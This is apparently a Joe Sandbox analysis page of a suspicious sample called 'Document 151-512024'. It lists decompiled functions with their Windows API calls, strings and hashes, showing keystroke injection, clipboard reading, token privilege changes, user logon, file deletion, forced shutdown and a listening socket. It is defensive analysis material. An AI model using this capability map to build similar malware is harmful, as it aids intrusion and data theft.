Instruction ID: 5792380016617b84cfe2641a9feb4671b30f1c511f9fe8827befe958d1be7b4d
Opcode Fuzzy Hash: 55eafbb5a3154e25af30cf7ea47213d644c1c6d3b4feb32d3ce3f76e07cbea69
Instruction Fuzzy Hash: 6012F371680215ABEB248F29CC49FAE7BF8EF85710F10852AF915EB2E1DB74D941CB50

Function 0095F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0095F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0099F474
IsIconic.USER32(00000000), ref: 0099F47D
ShowWindow.USER32(00000000,00000009), ref: 0099F48A
SetForegroundWindow.USER32(00000000), ref: 0099F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0099F4AA
GetCurrentThreadId.KERNEL32 ref: 0099F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0099F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0099F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0099F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0099F4DE
SetForegroundWindow.USER32(00000000), ref: 0099F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0099F4F6
keybd_event.USER32(00000012,00000000), ref: 0099F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0099F50B
keybd_event.USER32(00000012,00000000), ref: 0099F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0099F519
keybd_event.USER32(00000012,00000000), ref: 0099F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0099F528
keybd_event.USER32(00000012,00000000), ref: 0099F52D
SetForegroundWindow.USER32(00000000), ref: 0099F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0099F557

Strings

Shell_TrayWnd, xrefs: 0099F46F

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 547179e578ee333c0cbc4836b91a901deec7529214d82335e4ba38e542b92ccb
Instruction ID: 189e9b94de789fe7342b1295faa2ceaab490d95f8e083527c5e9392909e8e5e9
Opcode Fuzzy Hash: 547179e578ee333c0cbc4836b91a901deec7529214d82335e4ba38e542b92ccb
Instruction Fuzzy Hash: 2531A1B1A94219BBEF206BB55C4AFBF7F6CEB44B50F100026FA00E61D1C6B09D40FA61

Function 009A1201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 009A16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009A170D
Part of subcall function 009A16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009A173A
Part of subcall function 009A16C3: GetLastError.KERNEL32 ref: 009A174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 009A1286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 009A12A8
CloseHandle.KERNEL32(?), ref: 009A12B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009A12D1
GetProcessWindowStation.USER32 ref: 009A12EA
SetProcessWindowStation.USER32(00000000), ref: 009A12F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 009A1310

Part of subcall function 009A10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009A11FC), ref: 009A10D4
Part of subcall function 009A10BF: CloseHandle.KERNEL32(?,?,009A11FC), ref: 009A10E9

Strings

, xrefs: 009A125A
winsta0, xrefs: 009A12CC
default, xrefs: 009A130B

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: 6e131db3190dbd31670052d4054f358b2db4f0fc2cd921e4e37fef413a7e06fc
Instruction ID: 901b5cd08d78c5b4bd53e286a235b6336cbcaba0eb442eb90755d5abf418741d
Opcode Fuzzy Hash: 6e131db3190dbd31670052d4054f358b2db4f0fc2cd921e4e37fef413a7e06fc
Instruction Fuzzy Hash: 9881A0B1944209AFDF119FA8DC49FEE7BBDEF49704F14412AF910E61A0C7358984DBA4

Function 009A0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009A10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009A1114
Part of subcall function 009A10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,009A0B9B,?,?,?), ref: 009A1120
Part of subcall function 009A10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009A0B9B,?,?,?), ref: 009A112F
Part of subcall function 009A10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009A0B9B,?,?,?), ref: 009A1136
Part of subcall function 009A10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009A114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009A0BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009A0C00
GetLengthSid.ADVAPI32(?), ref: 009A0C17
GetAce.ADVAPI32(?,00000000,?), ref: 009A0C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009A0C6D
GetLengthSid.ADVAPI32(?), ref: 009A0C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 009A0C8C
HeapAlloc.KERNEL32(00000000), ref: 009A0C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 009A0CB4
CopySid.ADVAPI32(00000000), ref: 009A0CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009A0CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009A0D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 009A0D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009A0D45
HeapFree.KERNEL32(00000000), ref: 009A0D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009A0D55
HeapFree.KERNEL32(00000000), ref: 009A0D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009A0D65
HeapFree.KERNEL32(00000000), ref: 009A0D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 009A0D78
HeapFree.KERNEL32(00000000), ref: 009A0D7F

Part of subcall function 009A1193: GetProcessHeap.KERNEL32(00000008,009A0BB1,?,00000000,?,009A0BB1,?), ref: 009A11A1
Part of subcall function 009A1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,009A0BB1,?), ref: 009A11A8
Part of subcall function 009A1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,009A0BB1,?), ref: 009A11B7

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 6fa2a1f179d2427795ab1aefd42c160f96ce6db57f0576b5e285144a6cc6ba35
Instruction ID: 84b21a76848100677ed38287b95589f14d763d9d7afe3c4083db26416c2974a0
Opcode Fuzzy Hash: 6fa2a1f179d2427795ab1aefd42c160f96ce6db57f0576b5e285144a6cc6ba35
Instruction Fuzzy Hash: 9371AAB690421AEBDF10DFA4DC44FAEBBBCBF45310F04421AF914A7290D771AA45CBA0

Function 009BEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(009DCC08), ref: 009BEB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 009BEB37
GetClipboardData.USER32(0000000D), ref: 009BEB43
CloseClipboard.USER32 ref: 009BEB4F
GlobalLock.KERNEL32(00000000), ref: 009BEB87
CloseClipboard.USER32 ref: 009BEB91
GlobalUnlock.KERNEL32(00000000,00000000), ref: 009BEBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 009BEBC9
GetClipboardData.USER32(00000001), ref: 009BEBD1
GlobalLock.KERNEL32(00000000), ref: 009BEBE2
GlobalUnlock.KERNEL32(00000000,?), ref: 009BEC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 009BEC38
GetClipboardData.USER32(0000000F), ref: 009BEC44
GlobalLock.KERNEL32(00000000), ref: 009BEC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 009BEC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 009BEC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 009BECD2
GlobalUnlock.KERNEL32(00000000,?,?), ref: 009BECF3
CountClipboardFormats.USER32 ref: 009BED14
CloseClipboard.USER32 ref: 009BED59

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: a9f588f16c68cc6170008c04da25b97b94edb7cc26111cf520177acc7c604f51
Instruction ID: 752604757618098956ab45a487c80ea2dbec32c2d95c09fce2420c1279eb8d2c
Opcode Fuzzy Hash: a9f588f16c68cc6170008c04da25b97b94edb7cc26111cf520177acc7c604f51
Instruction Fuzzy Hash: 0461E174248202AFD300EF24C988FAAB7ECEF84724F54451EF496972A2CB71DD45DB62

Function 009B698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 009B69BE
FindClose.KERNEL32(00000000), ref: 009B6A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009B6A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009B6A75

Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 009B6AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 009B6ADF

Strings

%4d, xrefs: 009B6BB1
%4d%02d%02d%02d%02d%02d, xrefs: 009B6B6A
%03d, xrefs: 009B6DA2
%4d%02d%02d%02d%02d%02d%03d, xrefs: 009B6B32
%02d, xrefs: 009B6C00, 009B6C0A, 009B6C5A, 009B6CAA, 009B6CFA, 009B6D4A

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 1176fcfcc03054b3ecd0e3ce3d0a534a95fc8429c382dfecd2faf77b3941c7a1
Instruction ID: a748f4c39b381873f36ca1365c77cffd1071ced8d6a54972ddceae19241d73af
Opcode Fuzzy Hash: 1176fcfcc03054b3ecd0e3ce3d0a534a95fc8429c382dfecd2faf77b3941c7a1
Instruction Fuzzy Hash: 5FD151B2508304AEC710EBA4D991EAFB7ECAFC8704F44491DF589D7191EB74DA48CB62

Function 009B9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 009B9663
GetFileAttributesW.KERNEL32(?), ref: 009B96A1
SetFileAttributesW.KERNEL32(?,?), ref: 009B96BB
FindNextFileW.KERNEL32(00000000,?), ref: 009B96D3
FindClose.KERNEL32(00000000), ref: 009B96DE
FindFirstFileW.KERNEL32(*.*,?), ref: 009B96FA
SetCurrentDirectoryW.KERNEL32(?), ref: 009B974A
SetCurrentDirectoryW.KERNEL32(00A06B7C), ref: 009B9768
FindNextFileW.KERNEL32(00000000,00000010), ref: 009B9772
FindClose.KERNEL32(00000000), ref: 009B977F
FindClose.KERNEL32(00000000), ref: 009B978F

Strings

*.*, xrefs: 009B96F5

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 4aadd8be2fd8ee8fd2506eb16fd7f2613901032f6658f54159494faf91582595
Instruction ID: e29ca51d24593e0060daa9caf174e8ea30d3ef915d7b9a912486d3647d06ad97
Opcode Fuzzy Hash: 4aadd8be2fd8ee8fd2506eb16fd7f2613901032f6658f54159494faf91582595
Instruction Fuzzy Hash: 9531F5B25A520A7ECF10AFB4ED88ADE77ECAF49330F104556FA14E2190DB34DD80DA50

Function 009B979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 009B97BE
FindNextFileW.KERNEL32(00000000,?), ref: 009B9819
FindClose.KERNEL32(00000000), ref: 009B9824
FindFirstFileW.KERNEL32(*.*,?), ref: 009B9840
SetCurrentDirectoryW.KERNEL32(?), ref: 009B9890
SetCurrentDirectoryW.KERNEL32(00A06B7C), ref: 009B98AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 009B98B8
FindClose.KERNEL32(00000000), ref: 009B98C5
FindClose.KERNEL32(00000000), ref: 009B98D5

Part of subcall function 009ADAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009ADB00

Strings

*.*, xrefs: 009B983B

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: c2dcc7dd137360355872ef6e9546de34bd8241b2dcb6ff73d5a14198b077d08a
Instruction ID: 48a746a1bf56d7c54ec340153cac53929e9ce20894cbff7944a4d1b1a458d1d5
Opcode Fuzzy Hash: c2dcc7dd137360355872ef6e9546de34bd8241b2dcb6ff73d5a14198b077d08a
Instruction Fuzzy Hash: C231127159121A7EDF10EFB4ED88ADE77BCAF46334F108556EA14A21E0DB30DA84DA60

Function 009B8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 009B8257
SystemTimeToFileTime.KERNEL32(?,?), ref: 009B8267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009B8273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009B8310
SetCurrentDirectoryW.KERNEL32(?), ref: 009B8324
SetCurrentDirectoryW.KERNEL32(?), ref: 009B8356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009B838C
SetCurrentDirectoryW.KERNEL32(?), ref: 009B8395

Strings

*.*, xrefs: 009B839B

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: d20215fac5cb86c3cddba4eeae531bce7868fec19bdaa222160dfe0c4594c400
Instruction ID: bac26e4eea318a96a889b36e9f872372b278458c84d15b5517b03705c225cc96
Opcode Fuzzy Hash: d20215fac5cb86c3cddba4eeae531bce7868fec19bdaa222160dfe0c4594c400
Instruction Fuzzy Hash: C36149B25083459FCB10EF64C844AAFB3ECFF89324F04491AF99997251DB35E945CB92

Function 009AD076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00943AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00943A97,?,?,00942E7F,?,?,?,00000000), ref: 00943AC2

Part of subcall function 009AE199: GetFileAttributesW.KERNEL32(?,009ACF95), ref: 009AE19A

FindFirstFileW.KERNEL32(?,?), ref: 009AD122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 009AD1DD
MoveFileW.KERNEL32(?,?), ref: 009AD1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 009AD20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 009AD237

Part of subcall function 009AD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,009AD21C,?,?), ref: 009AD2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 009AD253
FindClose.KERNEL32(00000000), ref: 009AD264

Strings

\*.*, xrefs: 009AD0CD, 009AD0D6, 009AD0EB

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: c75acefe9f1c5c330a550d057c33b601527c41eb21959022112dae95590c6bff
Instruction ID: 32a07536020ce169c15998d4aa918b66eb007bbaed53c71f2c2de38db17c9fe2
Opcode Fuzzy Hash: c75acefe9f1c5c330a550d057c33b601527c41eb21959022112dae95590c6bff
Instruction Fuzzy Hash: 8F61617184610D9FCF05EBE0D952EEDB779AF96300F204165E41277192EB309F09DBA0

Function 009BED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 009BED91
EmptyClipboard.USER32 ref: 009BED97
GlobalAlloc.KERNEL32(00000002,?), ref: 009BEDAC
CloseClipboard.USER32 ref: 009BEEA3

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: b9340a26e4978a92b0d82300e1dd07e6de418c02c8da109a11a5227bf9f4c6ee
Instruction ID: b9686b00e159d4de95a9b80fa2e5eb25b2ae437ffca8eb2d1c5c52c80e75fd91
Opcode Fuzzy Hash: b9340a26e4978a92b0d82300e1dd07e6de418c02c8da109a11a5227bf9f4c6ee
Instruction Fuzzy Hash: 0041E275209212AFD710CF15D988F99BBE9FF84328F14C499E4268F6A2C775EC81CB90

Function 009AE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 009A16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009A170D
Part of subcall function 009A16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009A173A
Part of subcall function 009A16C3: GetLastError.KERNEL32 ref: 009A174A

ExitWindowsEx.USER32(?,00000000), ref: 009AE932

Strings

, xrefs: 009AE920
SeShutdownPrivilege, xrefs: 009AE902
@, xrefs: 009AE925
, xrefs: 009AE95C

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: af1e7a5d0fe6e2ce531549e0d1259a83c25d97e568e97c98f6ccef651394d7d2
Instruction ID: 7675fda27ef4ceeb0f37cd57baba3cd04ca3e0a23d716e840e1bbe497a70edb6
Opcode Fuzzy Hash: af1e7a5d0fe6e2ce531549e0d1259a83c25d97e568e97c98f6ccef651394d7d2
Instruction Fuzzy Hash: 29014972624311ABEB5422B4AC8AFFF735CAB86780F150822FC03F20D1D5A45C8091E0

Function 009C1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009C1276
WSAGetLastError.WSOCK32 ref: 009C1283
bind.WSOCK32(00000000,?,00000010), ref: 009C12BA
WSAGetLastError.WSOCK32 ref: 009C12C5
closesocket.WSOCK32(00000000), ref: 009C12F4
listen.WSOCK32(00000000,00000005), ref: 009C1303
WSAGetLastError.WSOCK32 ref: 009C130D
closesocket.WSOCK32(00000000), ref: 009C133C

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: fcbe47b592635e9a2649f5cea25efc15850ee8ed6ae8e16e36496062436c97cc
Instruction ID: 887437942f927d117d10d78a0f60605548c0590bb23e128a15342636dd6b1894
Opcode Fuzzy Hash: fcbe47b592635e9a2649f5cea25efc15850ee8ed6ae8e16e36496062436c97cc
Instruction Fuzzy Hash: 2B418E75A001419FD710DF64C488F2ABBE5AF86318F18818DE8668F293C771ED81DBE2

Function 0097B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0097B9D4
_free.LIBCMT ref: 0097B9F8
_free.LIBCMT ref: 0097BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,009E3700), ref: 0097BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,00A1121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0097BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00A11270,000000FF,?,0000003F,00000000,?), ref: 0097BC36
_free.LIBCMT ref: 0097BD4B

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
